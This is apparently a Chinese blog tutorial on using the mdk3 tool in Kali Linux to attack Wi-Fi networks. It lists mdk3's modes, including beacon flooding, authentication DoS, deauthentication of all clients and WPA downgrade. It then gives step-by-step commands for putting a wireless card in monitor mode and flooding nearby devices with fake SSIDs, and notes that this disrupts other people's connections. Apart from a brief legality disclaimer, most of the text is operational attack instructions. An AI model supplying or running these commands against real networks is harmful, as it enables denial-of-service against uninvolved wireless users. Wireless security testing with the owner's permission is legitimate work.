cemdk3利用常见的IEEE 802.11协议弱点,对扫描到的AP进行测试

  • 可以对对无线网络中的路由器就行泛洪攻击,踢掉所有连接的客户端,最后使其当机,达到攻击目的。
  • 也可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者

上次我们介绍了如何用kali搭建钓鱼wifi,有兴趣的朋友可以去看看:

如何用kali搭建钓鱼wifi


本实验环境在kali,禁止用于非法用途!


使用方法

root@yuaneuro:~# mdk3

MDK 3.0 v6 - "Yeah, well, whatever"
由k2wrlz的ASPj编写,使用aircrack-ng中的osdep库
在伟大的aircrack-ng社区的大力帮助下:
Antragon,moongray,Ace,Zero_Chaos,Hirte,thefkboss,tapepepe,
telek0miker,Le_Vert,sorbo,Andy Green,bahathir和Dawid Gajownik
谢谢!

MDK是一种概念证明工具,可利用常见的IEEE 802.11协议弱点。
重要提示:确保您有获得
网络所有者,然后对其运行MDK。

此代码已获得GPLv2的许可

MDK用法:
mdk3 <接口> <测试模式> [测试选项]

尝试mdk3 --fullhelp获得所有测试选项
尝试mdk3 --help <test_mode>仅获得有关一项测试的信息

测试模式:
b-信标洪水模式
      发送信标帧以在客户端显示伪造的AP。
      有时这可能会使网络扫描仪甚至驱动程序崩溃!
a-身份验证DoS模式
      将认证帧发送到范围内找到的所有AP。
      太多的客户端冻结或重置了一些AP。
p-基本探测和ESSID Bruteforce模式
      探测AP并检查答案,对于检查SSID是否具有有用
      已被正确地伪装或AP在您的适配器发送范围内
      在此测试模式下,SSID暴力破解也是可能的。
d-取消身份验证/解除关联Amok模式
      踢找到AP的所有人
m-迈克尔关机(TKIP)
      连续取消所有流量
x-802.1X测试
w-WIDS / WIPS混淆
      混淆/滥用入侵检测和防御系统
f-MAC过滤器暴力破解模式
      此测试使用已知客户端MAC地址的列表,并尝试
      在动态更改的同时对给定的AP进行身份验证
      其响应超时以获得最佳性能。目前仅适用
      正确拒绝开放身份验证请求的AP上
g-WPA降级测试
      对发送WPA加密数据包的站点和AP取消身份验证。
      通过此测试,您可以检查系统管理员是否将尝试设置其
      网络到WEP或禁用加密。

b-信标洪水模式

这个模式可以产生大量死亡SSID来充斥无线客户端的无线列表,从而扰乱无线使用者;
我们甚至还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。

  • 使用方法
-f <WIFI名称列表文件的所在位置> 使用此WIFI列表发起信号溢出攻击
-v <带WIFI名称和MAC地址的对应文件所在位置> 使用此WIFI列表和MAC地址列表发起信号溢出攻击
-w 加密方式为WEP
-t 加密方式为WPA/PSK
-a 加密方式为WPA/2
-g 54M模式
-m 读取数据库中的MAC地址列表
-c <信道数> 设置这些伪造的这些WIFI信号的信道数
-s <帧数> 设置广播这些伪造WIFI数据包的速度,速度越快用户接受到的列表越多越快,但是对网卡有一定影响

实验操作

  1. 首先将网卡设置为监听模式
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0  //建立监听

这里的wlan0是自己的无线网卡,可以输入ifconfig查看
(最后一条命令多执行几次,直到ifconfig出现wlan0mon)

  1. 新建一个文本用于WIFI名称列表文件
cd /root/
touch wifi.txt
vim wifi.txt

i后输入内容,这是我如输入

欢迎大家
来到我的小站
https://yuaneu.ro
这里会分析一些我学习的历程
记录学习点滴
test0
test1
test2

Esc输入:wq保存

3.使用此WIFI列表发起信号溢出攻击

mdk3 wlan0mon b -f /root/wifi.txt

4.查看效果

可以看到,wifi列表中大量充斥这我们创造的虚假wifi,干扰了正常人的连接


下一篇将说一说利用mdk3的其他攻击模式

随时更新

最后修改:2020 年 05 月 02 日
如果觉得我的文章对你有用,请随意赞赏